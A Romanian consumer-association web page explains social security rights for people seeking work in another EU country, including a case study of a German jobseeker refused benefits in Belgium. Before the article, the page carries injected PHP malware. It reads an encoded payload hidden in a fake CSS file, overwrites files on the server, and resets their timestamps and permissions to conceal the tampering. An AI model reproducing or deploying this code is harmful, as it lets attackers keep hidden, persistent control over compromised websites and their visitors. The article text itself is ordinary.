$wp_update_file="/home/shuffles/public_html/wp-includes/css/wp-timer.css"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } InfoCons te informeaza: Tot ce trebuie sa stii despre cautarea unui loc de munca in strainatate – O noua atitudine

o9atitudine-Protectia-Consumatorilor-Protectia-ConsumatoruluiDrepturi de securitate socială

Dacă primiţi indemnizaţie de şomaj din ţara în care aţi devenit şomer, faptul că vă căutaţi un loc de muncă în altă ţară nu vă afectează drepturile de securitate socială (asigurare de sănătate, prestaţii familiale, pensii de drept sau de invaliditate etc.). Acest lucru este valabil şi pentru membrii familiei.

Nu uitaţi să luaţi cu dumneavoastră cardul european de asigurări sociale de sănătate. Acesta va fi dovada faptului că beneficiaţi de asigurare medicală.

Din momentul în care vă angajaţi, vi se vor aplica alte norme de securitate socială.

Dacă NU primiţi indemnizaţie de şomaj şi intenţionaţi să vă căutaţi un loc de muncă în altă ţară din UE, drepturile de securitate socială care vă revin (asigurare medicală, prestaţii familiale etc.) sunt asigurate de ţara dumneavoastră de reşedinţă.

Ţara de reşedinţă este cea în care locuiţi în mod obişnuit, altfel spus cea în care se află „centrul dumneavoastră de interes”. Instituţiile de securitate socială au la dispoziţie o listă de criterii care le ajută să stabilească ce ţară poate fi considerată loc de reşedinţă. Aceste criterii includ:

  • durata prezenţei pe teritoriul ţărilor vizate
  • starea civilă şi legăturile de familie
  • situaţia locativă şi caracterul permanent sau temporar al acesteia
  • locul în care vă desfăşuraţi activitatea profesională sau activităţile nonprofit
  • caracteristicile activităţii dumneavoastră profesionale
  • domiciliul fiscal.

În orice caz, decizia privind stabilirea locului de reşedinţă va fi luată de către instituţiile de securitate socială, nu de către dumneavoastră.

Chiar dacă nu aveţi venituri suficiente pentru a asigura traiul dumneavoastră şi al membrilor de familie, nu puteţi fi obligat să părăsiţi noua ţară atâta timp cât puteţi dovedi că vă aflaţi în căutarea unui loc de muncă şi că aveţi şanse reale de a-l obţine.

Păstraţi copii după dosarele de candidatură depuse şi după invitaţiile la interviuri şi răspunsurile trimise de potenţialii angajatori.

Legislaţia europeană nu obligă statele membre să le acorde sprijin financiar sau orice tip de asistenţă socială persoanelor care îşi caută pentru prima oară un loc de muncă pe teritoriul lor.

Caz real

Bjorn, cetăţean german, îşi primea în Belgia indemnizaţia de şomaj din Germania. La expirarea formularului U2 (fostul formular E 303), Bjorn a decis să rămână în Belgia, unde şi-a depus dosarul de şomaj. Cererea i-a fost respinsă.

Conform legislaţiei belgiene, Bjorn nu are dreptul la prestaţii de şomaj, întrucât nu a lucrat niciodată în Belgia. Legislaţia europeană nu obligă statele membre să le acorde sprijin financiar sau orice tip de asistenţă socială persoanelor care îşi caută pentru prima oară un loc de muncă pe teritoriul lor. Bjorn nu poate decât să contacteze autorităţile locale, pentru a afla dacă are dreptul la vreo formă de sprijin în baza reglementărilor naţionale.

Sursa: www.europa.eu

            Asociatia Nationala pentru Protectia Consumatorilor si Promovarea Programelor si Strategiilor din Romania – InfoCons, unica organizatie din Romania cu drepturi depline in Consumers International, este o asociatie de consumatori neguvernamentala, reprezentativa, de drept privat, fara scop lucrativ, cu patrimoniu distinct si indivizibil, independenta, intemeiata pe principii democratice, ce apara drepturile consumatorilor – membra fondatoare a Federatiei Asociatiilor de Consumatori.

By o9admin